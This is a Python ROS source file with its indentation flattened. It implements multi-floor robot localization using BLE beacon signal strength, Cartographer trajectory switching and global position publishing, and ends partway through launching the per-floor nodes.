import argparse
import ast
import math
from enum import Enum
import numpy as np
import threading
import rospy
import roslaunch
import tf2_ros
import tf_conversions
from std_msgs.msg import String, Int64
from geometry_msgs.msg import TransformStamped, Vector3, Quaternion, Point, Pose
from geometry_msgs.msg import PoseStamped, PoseWithCovarianceStamped
from sensor_msgs.msg import Imu, PointCloud2, LaserScan, NavSatFix
from nav_msgs.msg import Odometry
from tf2_geometry_msgs import PoseStamped # necessary to use tfBuffer.transform(pose_stamped_msg, frame_id)
from tf2_geometry_msgs import PointStamped, Vector3Stamped
from cartographer_ros_msgs.msg import *
from cartographer_ros_msgs.srv import *
import geoutil
import resource_utils
from wireless_utils import extract_samples
from wireless_rss_localizer import SimpleRSSLocalizer
from mf_localization_msgs.msg import *
from mf_localization_msgs.srv import *
def json2anchor(jobj):
return geoutil.Anchor(lat = jobj["lat"],
lng = jobj["lng"],
rotate = jobj["rotate"],
)
class LocalizationMode(Enum):
INIT = "init"
TRACK = "track"
def __str__(self):
return self.value
def convert_samples_coordinate(samples, from_anchor, to_anchor, floor):
samples2 = []
for s in samples:
s2 = s.copy()
info = s["information"]
xy = geoutil.Point(x=info["x"], y= info["y"])
latlng = geoutil.local2global(xy, from_anchor)
local_coord = geoutil.global2local(latlng, to_anchor)
s2["information"]["x"] = local_coord.x
s2["information"]["y"] = local_coord.y
s2["information"]["floor"] = floor
samples2.append(s2)
return samples2
class FloorManager:
def __init__(self):
self.node_id = None
self.frame_id = None
self.localizer = None
self.map_filename = ""
# publisher
self.initialpose_pub = None
self.imu_pub = None
self.points_pub = None
# services
self.get_trajectory_states = None
self.finish_trajectory = None
self.start_trajectory = None
class MultiFloorManager:
def __init__(self):
# state variables
self.is_active = True
self.floor = None # state
self.area = None # state
self.current_frame = None # state
self.mode = None # state
self.valid_imu = False # state for input validation
self.valid_points2 = False # state for input validation
# for optimization detection
self.map2odom = None # state
self.optimization_detected = False # state
self.odom_displacement = 0 # used for print
# for loginfo
self.spin_count = 0
self.prev_spin_count = None
self.ble_localizer_dict = {}
self.ble_floor_localizer = None
# area identification
self.area_floor_const = 10000
self.area_localizer = None
self.seq_initialpose = 0
self.transforms = []
# average floor values
self.floor_queue_size = 10
self.floor_queue = [] # state
self.floor_list = [] # store known floor values
# failure detection
self.rmse_threshold = 5.0
self.loc_queue_min_size = 5
self.loc_queue_max_size = 10
self.loc_queue = []
self.loc_beacon_queue = []
# auto-relocalization
self.auto_relocalization = False
# frames
self.global_map_frame = "map"
self.local_map_frame = "map"
self.odom_frame = "odom"
self.published_frame = "base_link"
self.base_link_frame = "base_link"
self.global_position_frame = "base_link" # frame_id to compute global position
# publisher
self.current_floor_pub = rospy.Publisher("current_floor", Int64, latch=True, queue_size=10)
self.current_frame_pub = rospy.Publisher("current_frame", String, latch=True, queue_size=10)
self.current_map_filename_pub = rospy.Publisher("current_map_filename", String, latch=True, queue_size=10)
self.scan_matched_points2_pub = None
self.resetpose_pub = rospy.Publisher("resetpose", PoseWithCovarianceStamped, queue_size=10)
self.global_position_pub = rospy.Publisher("global_position", MFGlobalPosition, queue_size=10)
# Subscriber
self.scan_matched_points2_sub = None
# verbosity
self.verbose = False
# input data validation
self.norm_q_tolerance = 0.1 # to block [0,0,0,0] quaternion
self.norm_acc_threshold = 0.1 # to block [0,0,0] linear_acceleration
# for local_map_tf_timer_callback
self.local_map_tf = None
def imu_callback(self, msg):
# validate imu message
acc = msg.linear_acceleration
q = msg.orientation
acc_vec = np.array([acc.x, acc.y, acc.z])
q_vec = np.array([q.x, q.y, q.z, q.w])
norm_acc = np.linalg.norm(acc_vec)
norm_q = np.linalg.norm(q_vec)
if self.norm_acc_threshold <= norm_acc and np.abs(norm_q-1.0) < self.norm_q_tolerance:
self.valid_imu = True
else:
self.valid_imu = False
if not self.valid_imu:
rospy.loginfo("imu input is invalid. (linear_acceleration="+str(acc_vec)+", orientation="+str(q_vec)+")")
# use imu data
if (self.floor is not None) and (self.area is not None) and (self.mode is not None) and self.valid_imu:
imu_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].imu_pub
imu_pub.publish(msg)
def scan_callback(self, msg):
# Not implemented
pass
def points_callback(self, msg):
# validate points input
self.valid_points2 = True # set true if points message is coming
if self.floor is not None and self.area is not None and self.mode is not None:
points_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].points_pub
points_pub.publish(msg)
def odom_callback(self, msg):
if self.floor is not None and self.area is not None and self.mode is not None:
odom_pub = self.ble_localizer_dict[self.floor][self.area][self.mode].odom_pub
odom_pub.publish(msg)
def scan_matched_points2_callback(self, msg):
if self.scan_matched_points2_pub is None:
self.scan_matched_points2_pub = rospy.Publisher("scan_matched_points2", PointCloud2, queue_size=10)
self.scan_matched_points2_pub.publish(msg)
def initialpose_callback(self, pose_with_covariance_stamped_msg):
# PoseWithCovarianceStamped msg
# substitute ROS time to prevent error when gazebo is running and the pose message is published by rviz
pose_with_covariance_stamped_msg.header.stamp = rospy.Time.now()
if self.mode is None:
self.mode = LocalizationMode.INIT
if self.floor is None:
rospy.loginfo("floor is unknown. Set floor by calling /set_current_floor service before publishing the 2D pose estimate.")
if self.floor is not None and self.mode is not None:
# transform pose in the message from map frame to a local frame
pose_stamped_msg = PoseStamped()
pose_stamped_msg.header = pose_with_covariance_stamped_msg.header
pose_stamped_msg.pose = pose_with_covariance_stamped_msg.pose.pose
# detect area
x_area = [[pose_stamped_msg.pose.position.x, pose_stamped_msg.pose.position.y, float(self.floor)*self.area_floor_const]] # [x,y,floor]
self.area = self.area_localizer.predict(x_area)[0] # [area]
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
initialpose_pub = floor_manager.initialpose_pub
frame_id = floor_manager.frame_id
map_filename = floor_manager.map_filename
transformed_pose_stamped = tfBuffer.transform(pose_stamped_msg, frame_id, timeout=rospy.Duration(1.0)) # timeout 1.0 s
pose_with_covariance_stamped_msg.header = transformed_pose_stamped.header
pose_with_covariance_stamped_msg.pose.pose = transformed_pose_stamped.pose
pose_with_covariance_stamped_msg.pose.pose.position.z = 0.0 # set z = 0 to ensure 2D position on the local map
initialpose_pub.publish(pose_with_covariance_stamped_msg)
# publish current floor
current_floor_msg = Int64()
current_floor_msg.data = self.floor
self.current_floor_pub.publish(current_floor_msg)
# publish current frame
self.current_frame = frame_id
current_frame_msg = String()
current_frame_msg.data = self.current_frame
self.current_frame_pub.publish(current_frame_msg)
# publish current map_filename
self.current_map_filename_pub.publish(map_filename)
# update scan matched points subscriber
node_id = floor_manager.node_id
if self.scan_matched_points2_sub is not None:
self.scan_matched_points2_sub.unregister()
self.scan_matched_points2_sub = rospy.Subscriber(node_id+"/"+str(self.mode)+"/"+"scan_matched_points2", PointCloud2, self.scan_matched_points2_callback)
def restart_floor(self, local_pose):
# set z = 0 to ensure 2D position on the local map
local_pose.position.z = 0.0
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
frame_id = floor_manager.frame_id
initialpose_pub = floor_manager.initialpose_pub
map_filename = floor_manager.map_filename
### local_pose to pose_cov_stamped
pose_cov_stamped = PoseWithCovarianceStamped()
pose_cov_stamped.header.seq = self.seq_initialpose
self.seq_initialpose += 1
pose_cov_stamped.header.stamp = rospy.Time.now()
pose_cov_stamped.header.frame_id = frame_id
pose_cov_stamped.pose.pose = local_pose
covariance = np.diag(self.initial_pose_variance)
pose_cov_stamped.pose.covariance = list(covariance.flatten())
#initialpose_pub.publish(pose_cov_stamped)
#rospy.loginfo("published /"+ floor_manager.node_id+"/"+str(self.mode)+"/initialpose" )
self.resetpose_pub.publish(pose_cov_stamped)
status_code_start_trajectory = self.start_trajectory_with_pose(local_pose)
rospy.loginfo("called /"+ floor_manager.node_id+"/"+str(self.mode)+"/start_trajectory")
# publish current floor
current_floor_msg = Int64()
current_floor_msg.data = self.floor
self.current_floor_pub.publish(current_floor_msg)
# publish current frame
self.current_frame = frame_id
current_frame_msg = String()
current_frame_msg.data = self.current_frame
self.current_frame_pub.publish(current_frame_msg)
# publish current map_filename
self.current_map_filename_pub.publish(map_filename)
# update scan matched points subscriber
node_id = floor_manager.node_id
if self.scan_matched_points2_sub is not None:
self.scan_matched_points2_sub.unregister()
self.scan_matched_points2_sub = rospy.Subscriber(node_id+"/"+str(self.mode)+"/"+"scan_matched_points2", PointCloud2, self.scan_matched_points2_callback)
# simple failure detection based on the root mean square error between tracked and estimated locations
def check_localization_failure(self, loc_track, loc_est):
if self.verbose:
rospy.loginfo("loc_track="+str(loc_track)+", loc_est="+str(loc_est))
if self.loc_queue_max_size <= len(self.loc_queue):
self.loc_queue.pop(0)
self.loc_beacon_queue.pop(0)
self.loc_queue.append(loc_track)
self.loc_beacon_queue.append(loc_est)
failure_detected = False
if self.loc_queue_min_size <= len(self.loc_queue):
X1 = np.array(self.loc_queue)
X2 = np.array(self.loc_beacon_queue)
rmse = np.sqrt(np.mean(np.sum((X1-X2)**2, axis=1)))
if self.rmse_threshold <= rmse:
failure_detected = True
# clear location lists
self.loc_queue = []
self.loc_beacon_queue = []
if self.verbose:
rospy.loginfo("rmse="+str(rmse) + ", failure_detected="+str(failure_detected))
return failure_detected
def beacons_callback(self, message):
if self.verbose:
rospy.loginfo("multi_floor_manager.beacons_callback")
if not self.is_active:
# do nothing
return
data = json.loads(message.data)
beacons = data["data"]
# detect floor
loc = self.ble_floor_localizer.predict(beacons) # [[x,y,z,floor]]
if loc is None:
return
if self.verbose:
print("loc=",str(loc))
floor_raw = loc[0,3]
if len(self.floor_queue) < self.floor_queue_size:
self.floor_queue.append(floor_raw)
else:
self.floor_queue.pop(0)
self.floor_queue.append(floor_raw)
# use one of the known floor values closest to the mean value of floor_queue
mean_floor = np.mean(self.floor_queue)
idx_floor = np.abs(np.array(self.floor_list) - mean_floor).argmin()
floor = self.floor_list[idx_floor]
# detect area
x_area = [[loc[0,0], loc[0,1], floor*self.area_floor_const]] # [x,y,floor]
area = self.area_localizer.predict(x_area)[0] # [area]
if self.verbose:
rospy.loginfo("floor = "+str(floor) + ", area=" + str(area) )
# check other sensor data before staring a trajectory.
if not (self.valid_imu and self.valid_points2):
return # do not start a new trajectory if other sensor data are not ready.
# switch cartgrapher node
if self.floor is None:
self.floor = floor
self.area = area
self.mode = LocalizationMode.INIT
rospy.loginfo("initialize floor = "+str(self.floor))
# coarse initial localization on local frame (frame_id)
ble_localizer = self.ble_localizer_dict[self.floor][self.area][LocalizationMode.INIT].localizer
if ble_localizer is None:
raise RuntimeError("Unknown floor for BLE localizer "+str(self.floor))
# local_loc is on the local coordinate on frame_id
local_loc = ble_localizer.predict(beacons)
# project loc to sample locations
local_loc = ble_localizer.find_closest(local_loc)
# create a local pose instance
position = Point(local_loc[0,0], local_loc[0,1], local_loc[0,2]) # use the estimated position
orientation = Quaternion(0.0, 0.0, 0.0, 1.0) # orientation is unknown.
local_pose = Pose(position, orientation)
self.restart_floor(local_pose)
# floor change or init->track
elif self.floor != floor or (self.mode==LocalizationMode.INIT and self.optimization_detected):
if self.floor != floor:
rospy.loginfo("floor change detected (" + str(self.floor) + " -> " + str(floor) + ")." )
else:
rospy.loginfo("optimization_detected. change localization mode init->track (displacement="+str(self.odom_displacement)+")")
# set temporal variables
target_floor = floor
target_area = area
target_mode = LocalizationMode.TRACK
# check the availablity of local_pose on the target frame
floor_manager = self.ble_localizer_dict[target_floor][target_area][target_mode]
frame_id = floor_manager.frame_id # target frame_id
local_transform = None
try:
# tf from the origin of the target floor to the robot pose
local_transform = tfBuffer.lookup_transform(frame_id, self.base_link_frame, rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.logerr('LookupTransform Error from '+ frame_id +" to " + self.base_link_frame )
# update the trajectory only when local_transform is available
if local_transform is not None:
if self.floor != floor: # floor change
pass # nothing to do
else:
self.optimization_detected = False
# create local_pose instance
position = local_transform.transform.translation # Vector3
orientation = local_transform.transform.rotation # Quaternion
local_pose = Pose(position, orientation)
# try to finish the current trajectory before updating state variables
self.finish_trajectory()
# update state variables to switch floor
self.floor = target_floor
self.area = target_area
self.mode = target_mode
# restart trajectory with the updated state variables
self.restart_floor(local_pose)
else:
# check localization failure
try:
t = tfBuffer.lookup_transform(self.global_map_frame, self.base_link_frame, rospy.Time(0))
loc2D_track = np.array([t.transform.translation.x, t.transform.translation.y])
loc2D_beacon = np.array([loc[0,0], loc[0,1]])
failure_detected = self.check_localization_failure(loc2D_track, loc2D_beacon)
if failure_detected and self.auto_relocalization:
self.restart_localization()
rospy.logerr("Auto-relocalization. (localization failure detected)")
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error from '+ self.global_map_frame +" to " + self.base_link_frame)
# broadcast tf from global_map_frame to each (local) map_frame
# [deprecated]
#def transforms_timer_callback(self, timer):
# for t in self.transforms:
# t.header.stamp = rospy.Time.now() # update timestamp
# broadcaster.sendTransform(self.transforms)
# broadcast tf from global_map_frame to each (local) map_frame
def send_static_transforms(self):
for t in self.transforms:
t.header.stamp = rospy.Time.now() # update timestamp
static_broadcaster.sendTransform(self.transforms)
# broadcast tf between the current_frame to local_map_frame
def local_map_tf_timer_callback(self, timer):
if self.local_map_tf is None:
# initialization
t = TransformStamped()
t.child_frame_id = self.local_map_frame # static
t.transform.translation = Vector3(0.0, 0.0, 0.0) # static
q = tf_conversions.transformations.quaternion_from_euler(0, 0, 0, 'sxyz')
rotation = Quaternion(*q)
t.transform.rotation = rotation # static
# tentative values
t.header.stamp = rospy.Time.now()
t.header.frame_id = None
self.local_map_tf = t
if self.current_frame is not None:
t = self.local_map_tf
# send transform only when current_frame changes
if self.current_frame != t.header.frame_id:
t.header.stamp = rospy.Time.now()
t.header.frame_id = self.current_frame
transform_list = self.transforms + [t] # to keep self.transforms in static transform
static_broadcaster.sendTransform(transform_list)
# publish global position
def global_position_callback(self, timer):
averaging_interval = self.global_position_averaging_interval
try:
# convert global position on global_map_frame to lat lng
end_time = tfBuffer.get_latest_common_time(self.global_map_frame, self.global_position_frame) # latest available time
start_time = end_time - rospy.Duration(averaging_interval)
trans_pos = tfBuffer.lookup_transform(self.global_map_frame, self.global_position_frame, end_time)
xy = geoutil.Point(x=trans_pos.transform.translation.x, y=trans_pos.transform.translation.y)
latlng = geoutil.local2global(xy, self.global_anchor)
floor = self.floor
# convert robot rotation to heading
anchor_rotation = self.global_anchor.rotate # degrees (0 -> north, clock-wise)
euler_angles = tf_conversions.transformations.euler_from_quaternion([trans_pos.transform.rotation.x, trans_pos.transform.rotation.y, trans_pos.transform.rotation.z, trans_pos.transform.rotation.w], 'sxyz')
yaw_angle = euler_angles[2] #[roll, pitch, yaw] radien (0 -> x-axis, counter-clock-wise)
heading = anchor_rotation + 90.0 - 180.0*yaw_angle/math.pi # added 90 degrees to convert y-axis to x-axis
heading = heading % 360 # clip to the space of heading [0, 2pi]
# velocity on odom_frame to prevent it from jumping]
trans_vel_end = tfBuffer.lookup_transform(self.odom_frame, self.global_position_frame, end_time)
trans_vel_start = tfBuffer.lookup_transform(self.odom_frame, self.global_position_frame, start_time)
delta_x = trans_vel_end.transform.translation.x - trans_vel_start.transform.translation.x
delta_y = trans_vel_end.transform.translation.y - trans_vel_start.transform.translation.y
v_x = delta_x/averaging_interval
v_y = delta_y/averaging_interval
v_xy = math.sqrt(v_x**2 + v_y**2)
# create and publishg a MFGlobalPosition message
global_position = MFGlobalPosition()
global_position.header.stamp = end_time
global_position.header.frame_id = self.global_position_frame
global_position.latitude = latlng.lat
global_position.longitude = latlng.lng
global_position.floor = floor
global_position.heading = heading
global_position.speed = v_xy
self.global_position_pub.publish(global_position)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error '+self.global_map_frame+" -> "+self.global_position_frame)
except tf2_ros.TransformException as e:
rospy.loginfo(e.message)
def stop_localization_callback(self, data):
resp = StatusResponse()
if not self.is_active:
resp.code = 1
resp.message = "Stop localization failed. (localization is aleady stopped.)"
return resp
try:
self.is_active = False
self.finish_trajectory()
self.reset_states()
resp.code = 0
resp.message = "Stopped localization."
except:
resp.code = 1
resp.message = "Stop localization failed."
return resp
def start_localization_callback(self, data):
resp = StatusResponse()
if self.is_active:
resp.code = 1
resp.message = "Start localization failed. (localization is aleady started.)"
return resp
self.is_active = True
resp.code = 0
resp.message = "Starting localization."
return resp
def finish_trajectory(self):
# try to finish the current trajectory
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
get_trajectory_states = floor_manager.get_trajectory_states
finish_trajectory = floor_manager.finish_trajectory
res0 = get_trajectory_states()
rospy.loginfo(res0)
last_trajectory_id = res0.trajectory_states.trajectory_id[-1]
last_trajectory_state = ord(res0.trajectory_states.trajectory_state[-1]) # uint8 -> int
# finish trajectory only if the trajectory is active.
if last_trajectory_state in [TrajectoryStates.ACTIVE]:
trajectory_id_to_finish = last_trajectory_id
res1 = finish_trajectory(trajectory_id_to_finish)
rospy.loginfo(res1)
def start_trajectory_with_pose(self, initial_pose):
floor_manager = self.ble_localizer_dict[self.floor][self.area][self.mode]
start_trajectory = floor_manager.start_trajectory
# start trajectory
configuration_directory = floor_manager.configuration_directory
configuration_basename = floor_manager.configuration_basename
use_initial_pose = True
relative_to_trajectory_id = 0
res2 = start_trajectory(configuration_directory,
configuration_basename,
use_initial_pose,
initial_pose,
relative_to_trajectory_id
)
rospy.loginfo(res2)
status_code = res2.status.code
return status_code
def reset_states(self):
self.floor = None
self.area = None
self.current_frame = None
self.mode = None
self.map2odom = None
self.optimization_detected = False
self.floor_queue = []
self.spin_count = 0
self.prev_spin_count = None
self.valid_imu = False
self.valid_points2 = False
tfBuffer.clear() # clear buffered tf added by finished trajectories
def restart_localization(self):
self.is_active = False
self.finish_trajectory()
self.reset_states()
self.is_active = True
def restart_localization_callback(self, data):
resp = StatusResponse()
try:
self.restart_localization()
resp.code = 0
resp.message = "Restarting localization..."
except:
resp.code = 1
resp.message = "Restart localization failed."
return resp
def enable_relocalization_callback(self, data):
resp = StatusResponse()
self.auto_relocalization = True
resp.code = 0
resp.message = "Enabled auto relocalization."
return resp
def disable_relocalization_callback(self, data):
resp = StatusResponse()
self.auto_relocalization = False
resp.code = 0
resp.message = "Disabled auto relocalization."
return resp
def set_current_floor_callback(self, data):
resp = StatusResponse()
floor = int(data.data)
if self.floor is None:
self.floor = floor
resp.code = 0
resp.message = "Set floor to " + str(floor) + "."
else:
resp.code = 1
resp.message = "Failed to set floor to " + str(floor) + ". Floor is already set to "+str(self.floor)+"."
return resp
# return
# MFGlobalPosition global_position
# input:
# MFLocalPosition local_position
def convert_local_to_global_callback(self, msg):
averaging_interval = self.global_position_averaging_interval
try:
pos = PointStamped()
vel = Vector3Stamped()
pos.header = msg.local_position.header
vel.header = msg.local_position.header
pos.point = msg.local_position.position
vel.vector = msg.local_position.velocity
transformed_position_stamped = tfBuffer.transform(pos, self.global_map_frame, timeout=rospy.Duration(1.0)) # timeout 1.0 s
transformed_velocity_stamped = tfBuffer.transform(vel, self.global_map_frame, timeout=rospy.Duration(1.0)) # timeout 1.0 s
# point to latlng
xy = geoutil.Point(x=transformed_position_stamped.point.x, y=transformed_position_stamped.point.y)
latlng = geoutil.local2global(xy, self.global_anchor)
floor = self.floor
# velocity vector to heading and speed
speed = np.sqrt(transformed_velocity_stamped.vector.x**2 + transformed_velocity_stamped.vector.y**2)
yaw_angle = np.arctan2(transformed_velocity_stamped.vector.y, transformed_velocity_stamped.vector.x) # heading angle
anchor_rotation = self.global_anchor.rotate # degrees (0 -> north, clock-wise)
heading = anchor_rotation + 90.0 - 180.0*yaw_angle/math.pi # added 90 degrees to convert y-axis to x-axis
heading = heading % 360 # clip to the space of heading [0, 2pi]
# create a
global_position = MFGlobalPosition()
global_position.header.stamp = transformed_position_stamped.header.stamp
global_position.header.frame_id = self.global_position_frame
global_position.latitude = latlng.lat
global_position.longitude = latlng.lng
global_position.floor = floor
global_position.heading = heading
global_position.speed = speed
return global_position
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
rospy.loginfo('LookupTransform Error '+self.global_map_frame+" -> "+self.global_position_frame)
return None
except tf2_ros.TransformException as e:
return None
class CurrentPublisher:
def __init__(self, verbose=False):
self.verbose = False
self.publish_current_rate = rospy.get_param("~publish_current_rate", 0) # 0 for latch
self.current_floor = None
self.current_frame = None
self.current_map_filename = None
rospy.Subscriber("current_floor", Int64, self.current_floor_cb)
rospy.Subscriber("current_frame", String, self.current_frame_cb)
rospy.Subscriber("current_map_filename", String, self.current_map_filename_cb)
self.pub_floor = rospy.Publisher("current_floor", Int64, queue_size=max(self.publish_current_rate, 1))
self.pub_frame = rospy.Publisher("current_frame", String, queue_size=max(self.publish_current_rate, 1))
self.pub_map = rospy.Publisher("current_map_filename", String, queue_size=max(self.publish_current_rate, 1))
if self.publish_current_rate == 0:
if self.verbose:
rospy.loginfo("node will not publish current regularly (publish_current_rate = 0)")
return
self.thread = threading.Thread(target=self.publish_current)
self.thread.start()
def current_floor_cb(self, msg):
self.current_floor = msg
def current_frame_cb(self, msg):
self.current_frame = msg
def current_map_filename_cb(self, msg):
self.current_map_filename = msg
def publish_current(self):
rate = rospy.Rate(self.publish_current_rate)
if self.verbose:
rospy.loginfo("node will publish current regularly (publish_current_rate = {})".format(self.publish_current_rate))
while not rospy.is_shutdown():
#publish
if self.current_floor is not None:
if self.verbose:
rospy.loginfo("current_floor = {}".format(self.current_floor.data))
self.pub_floor.publish(self.current_floor)
if self.current_frame is not None:
if self.verbose:
rospy.loginfo("current_frame = {}".format(self.current_frame.data))
self.pub_frame.publish(self.current_frame)
if self.current_map_filename is not None:
if self.verbose:
rospy.loginfo("current_map_filename = {}".format(self.current_map_filename.data))
self.pub_map.publish(self.current_map_filename)
if self.verbose:
rospy.loginfo("try to publish")
rate.sleep()
if __name__ == "__main__":
rospy.init_node('multi_floor_manager')
launch = roslaunch.scriptapi.ROSLaunch()
launch.start()
sub_topics = rospy.get_param("~topic_list", ['beacons','wireless/beacons','wireless/wifi'])
static_broadcaster = tf2_ros.StaticTransformBroadcaster()
broadcaster = tf2_ros.TransformBroadcaster()
tfBuffer = tf2_ros.Buffer()
tfListener = tf2_ros.TransformListener(tfBuffer)
multi_floor_manager = MultiFloorManager()
# load node parameters
configuration_directory_raw = rospy.get_param("~configuration_directory")
configuration_file_prefix = rospy.get_param("~configuration_file_prefix")
temporary_directory_name = rospy.get_param("~temporary_directory_name", "tmp")
multi_floor_manager.local_map_frame = rospy.get_param("~local_map_frame", "map")
multi_floor_manager.global_map_frame = rospy.get_param("~global_map_frame", "map")
multi_floor_manager.odom_frame = rospy.get_param("~odom_frame", "odom")
multi_floor_manager.published_frame = rospy.get_param("~published_frame", "base_link")
multi_floor_manager.global_position_frame = rospy.get_param("~global_position_frame", "base_link")
meters_per_floor = rospy.get_param("~meters_per_floor", 5)
odom_dist_th = rospy.get_param("~odom_displacement_threshold", 0.1)
multi_floor_manager.floor_queue_size = rospy.get_param("~floor_queue_size", 3)
multi_floor_manager.initial_pose_variance = rospy.get_param("~initial_pose_variance", [3, 3, 0.1, 0, 0, 100])
n_neighbors_floor = rospy.get_param("~n_neighbors_floor", 3)
n_neighbors_local = rospy.get_param("~n_neighbors_local", 3)
min_beacons_floor = rospy.get_param("~min_beacons_floor", 3)
min_beacons_local = rospy.get_param("~min_beacons_local", 3)
# auto-relocalization parameters
multi_floor_manager.auto_relocalization = rospy.get_param("~auto_relocalization", False)
multi_floor_manager.rmse_threshold = rospy.get_param("~rmse_threshold", 5.0)
multi_floor_manager.loc_queue_min_size = rospy.get_param("~location_queue_min_size", 5)
multi_floor_manager.loc_queue_max_size = rospy.get_param("~location_queue_max_size", 10)
multi_floor_manager.verbose = rospy.get_param("~verbose", False)
# global position parameters
global_position_interval = rospy.get_param("~global_position_interval", 1.0) # default 1 [s] -> 1 [Hz]
multi_floor_manager.global_position_averaging_interval = rospy.get_param("~averaging_interval", 1.0) # default 1 [s]
current_publisher = CurrentPublisher(verbose=rospy.get_param("~verbose", False))
# configuration file check
configuration_directory = resource_utils.get_filename(configuration_directory_raw)
temporary_directory = os.path.join(configuration_directory, temporary_directory_name)
if not os.path.exists(temporary_directory):
rospy.logerr("temporary_directory ["+temporary_directory+"] does not exist.")
raise RuntimeError("temporary_directory ["+temporary_directory+"] does not exist.")
# resolve topic remapping
imu_topic_name = rospy.names.resolve_name("imu")
scan_topic_name = rospy.names.resolve_name("scan")
points2_topic_name = rospy.names.resolve_name("points2")
beacons_topic_name = rospy.names.resolve_name("beacons")
initialpose_topic_name = rospy.names.resolve_name("initialpose")
odom_topic_name = rospy.names.resolve_name("odom")
# rss offset parameter
rssi_offset = 0.0
robot = rospy.get_param("~robot", "")
# set from the dictionary
if rospy.has_param("~rssi_offset_list"):
rssi_offset_list = rospy.get_param("~rssi_offset_list")
if robot in rssi_offset_list.keys():
rssi_offset = rssi_offset_list[robot]
# overwrite rssi_offset if exists
if rospy.has_param("~rssi_offset"):
rssi_offset = rospy.get_param("~rssi_offset")
rospy.loginfo("rssi_offset="+str(rssi_offset))
# load the main anchor point
anchor_dict = rospy.get_param("~anchor")
map_list = rospy.get_param("~map_list")
modes = [LocalizationMode.INIT , LocalizationMode.TRACK]
global_anchor = geoutil.Anchor(lat = anchor_dict["latitude"],
lng = anchor_dict["longitude"],
rotate = anchor_dict["rotate"]
)
multi_floor_manager.global_anchor = global_anchor
samples_global_all = []
floor_set = set()
for map_dict in map_list:
floor = float(map_dict["floor"])
floor_str = str(int(map_dict["floor"]))
area = int(map_dict["area"]) if "area" in map_dict else 0
area_str = str(area)
node_id = map_dict["node_id"]
frame_id = map_dict["frame_id"]
anchor = geoutil.Anchor(lat = map_dict["latitude"],
lng = map_dict["longitude"],
rotate = map_dict["rotate"]
)
load_state_filename = resource_utils.get_filename(map_dict["load_state_filename"])
samples_filename = resource_utils.get_filename(map_dict["samples_filename"])
map_filename = map_dict["map_filename"] if "map_filename" in map_dict else "" # keep the original string without resource resolving. if not found in map_dict, use "".
floor_set.add(floor)
with open(samples_filename, "r") as f:
samples = json.load(f)
# extract iBeacon samples
samples = extract_samples(samples, key="iBeacon")
# append area information to the samples
for s in samples:
s["information"]["area"] = area
# fit localizer for the floor
ble_localizer_floor = SimpleRSSLocalizer(n_neighbors=n_neighbors_local, min_beacons=min_beacons_local, rssi_offset=rssi_offset)
ble_localizer_floor.fit(samples)
if not floor in multi_floor_manager.ble_localizer_dict:
multi_floor_manager.ble_localizer_dict[floor] = {}
multi_floor_manager.ble_localizer_dict[floor][area] = {}
# run ros nodes
for mode in modes:
namespace = node_id+"/"+str(mode)
sub_mode = "tracking" if mode == LocalizationMode.TRACK else "rss_localization"
included_configuration_basename = configuration_file_prefix + "_" + sub_mode + ".lua"
tmp_configuration_basename = temporary_directory_name + "/" + configuration_file_prefix + "_" + sub_mode + "_" + floor_str + "_" + area_str + ".lua"
# create temporary config files
with open(os.path.join(configuration_directory, tmp_configuration_basename), "w") as f:
f.write("include \""+included_configuration_basename+"\"")
f.write("options.map_frame = \""+frame_id+"\"")
f.write("options.odom_frame = \""+multi_floor_manager.odom_frame+"\"")
f.write("options.published_frame = \""+multi_floor_manager.published_frame+"\"")
f.write("return options")
package1 = "cartographer_ros"
executable1 = "cartographer_node"
package2 = "mf_localization"
executable2 = "trajectory_restarter.py"
# run cartographer node
node1 = roslaunch.core.Node(package1, executable1,
name="cartographer_node",
namespace = namespace,
remap_args = [("scan", scan_topic_name), ("points2", points2_topic_name), ("imu", imu_topic_name), ("odom", odom_topic_name)],
output = "screen"
)
node1.args = "-configuration_directory " + configuration_directory \
+ " -configuration_basename " + tmp_configuration_basename \
+ " -load_state_filename " + load_state_filename \
+ " -start_trajectory_with_default_topics=false"
script1 = launch.launch(node1)
# trajectory restarter
# set ros parameters before running a node that uses the parameters
rospy.set_param(namespace+"/trajectory_restarter/configuration_directory", configuration_directory)
rospy.set_param(namespace+"/trajectory_restarter/configuration_basename", tmp_configuration_basename)
node2 = roslaunch.core.Node(package2, executable2,
namespace = namespace,
name="trajectory_restarter",
output = "screen")
script2 = launch.launch(node2)
# create floor_manager
floor_manager = FloorManager()
floor_manager.configuration_directory = configuration_directory
floor_manager.configuration_basename = tmp_configuration_basename
multi_floor_manager.ble_localizer_dict[floor][area][mode] = floor_manager
# set values to floor_manager
for mode in modes:
floor_manager = multi_floor_manager.ble_localizer_dict[floor][area][mode]
floor_manager.localizer = ble_localizer_floor
floor_manager.node_id = node_id
floor_manager.frame_id = frame_id
floor_manager.map_filename = map_filename
# publishers
floor_manager.imu_pub = rospy.Publisher(node_id+"/"+str(mode)+imu_topic_name , Imu, queue_size=4000)
floor_manager.points_pub = rospy.Publisher(node_id+"/"+str(mode)+points2_topic_name, PointCloud2, queue_size=100)
floor_manager.initialpose_pub = rospy.Publisher(node_id+"/"+str(mode)+initialpose_topic_name, PoseWithCovarianceStamped, queue_size=10)
floor_manager.odom_pub = rospy.Publisher(node_id+"/"+str(mode)+odom_topic_name, Odometry, queue_size=100)
# rospy service
rospy.wait_for_service(node_id+"/"+str(mode)+'/get_trajectory_states')
rospy.wait_for_service(node_id+"/"+str(mode)+'/finish_trajectory')
rospy.wait_for_service(node_id+"/"+str(mode)+'/start_trajectory')
floor_manager.get_trajectory_states = rospy.ServiceProxy(node_id+"/"+str(mode)+'/get_trajectory_states', GetTrajectoryStates)
floor_manager.finish_trajectory = rospy.ServiceProxy(node_id+"/"+str(mode)+'/finish_trajectory', FinishTrajectory)
floor_manager.start_trajectory = rospy.ServiceProxy(node_id+"/"+str(mode)+'/start_trajectory', StartTrajectory)
